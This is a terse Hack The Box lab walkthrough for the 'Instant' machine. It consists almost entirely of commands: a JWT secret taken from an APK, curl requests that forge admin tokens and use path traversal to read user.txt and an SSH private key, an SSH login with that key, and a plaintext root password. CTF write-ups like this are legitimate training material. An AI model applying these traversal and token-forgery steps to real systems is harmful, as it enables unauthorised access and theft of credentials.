Instant HTB Writeup
HTB machine link:
https://app.hackthebox.com/machines/Instant
Recon Link to heading
sudo echo "10.10.11.37 instant.htb" | sudo tee -a /etc/hosts
Go to the website
When you click on the ‘DOWNLOAD NOW’ button, the apk file is downloaded
wget http://instant.htb/downloads/instant.apk
Get JWT token from apk file. Secret key jwt -VeryStrongS3cretKeyY0uC4NTGET
Quick Solve Link to heading
sudo echo "10.10.11.37 swagger-ui.instant.htb" | sudo tee -a /etc/hosts
User flag Link to heading
curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/read/log?log_file_name=..%2Fuser.txt" -H "accept: application/json" -H "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA"
Root flag Link to heading
Get RSA Private key
curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/read/log?log_file_name=..%2F.ssh%2Fid_rsa" -H "accept: application/json" -H "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA"
Copy RSA Private key to id_rsa
nano id_rsa
chmod 600 id_rsa
ssh -i id_rsa [email protected]
su root
root password - 12**24nzC!r0c%q12
cat /root/root.txt